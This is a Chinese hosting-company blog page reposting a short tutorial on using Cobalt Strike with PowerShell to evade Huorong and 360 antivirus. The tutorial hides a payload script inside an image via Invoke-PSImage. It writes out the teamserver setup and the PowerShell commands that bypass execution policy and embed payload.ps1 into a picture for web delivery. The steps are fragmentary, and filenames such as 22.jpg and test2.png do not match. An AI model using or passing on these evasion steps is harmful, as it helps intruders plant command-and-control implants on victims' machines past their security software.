扫二维码与项目经理沟通
我们在微信上24小时期待你的声音
解答本文疑问/技术咨询/运营咨询/技术建议/互联网交流
这篇文章将为大家详细讲解有关Cobalt Strike如何使用powershell过火绒360免杀,小编觉得挺实用的,因此分享给大家做个参考,希望大家阅读完这篇文章后可以有所收获。
创新互联公司从2013年创立,先为綦江等服务建站,綦江等地企业,进行企业商务咨询服务。为綦江企业网站制作PC+手机+微官网三网同步一站式服务解决您的所有建站问题。
一台kali
一台试验机(装了火绒)
一张1920*1200的图片(只能大不能小),后面代码要插入图片里,像素小了位数不够。
Cobalt Strike工具
Invoke-psimage脚本
下载Cobalt Strike工具,复制到kali,在此文件位置打开终端
进入文件夹里,执行teamserver文件,IP地址是自己kali的ip(打个码,害怕大佬连我),123456随便设的密码,一会windows上连接要用,生成一串hash
运行之后出现,密码就是kali设置的密码,ip,端口,用户名默认就可以,连接进入图形化界面
Powershell -ExecutionPolicy Bypass
Import-Module.\Invoke-PSImage.ps1
Invoke-PSImage -Script .\payload.ps1 -Image .\test1.jpg -Out test2.png -Web
生成的一串代码保存下来
文件夹里生成了一个22.jpg,一会上传到kali监听机上
关于“Cobalt Strike如何使用powershell过火绒360免杀”这篇文章就分享到这里了,希望以上内容可以对大家有一定的帮助,使各位可以学到更多知识,如果觉得文章不错,请把它分享出去让更多的人看到。
我们在微信上24小时期待你的声音
解答本文疑问/技术咨询/运营咨询/技术建议/互联网交流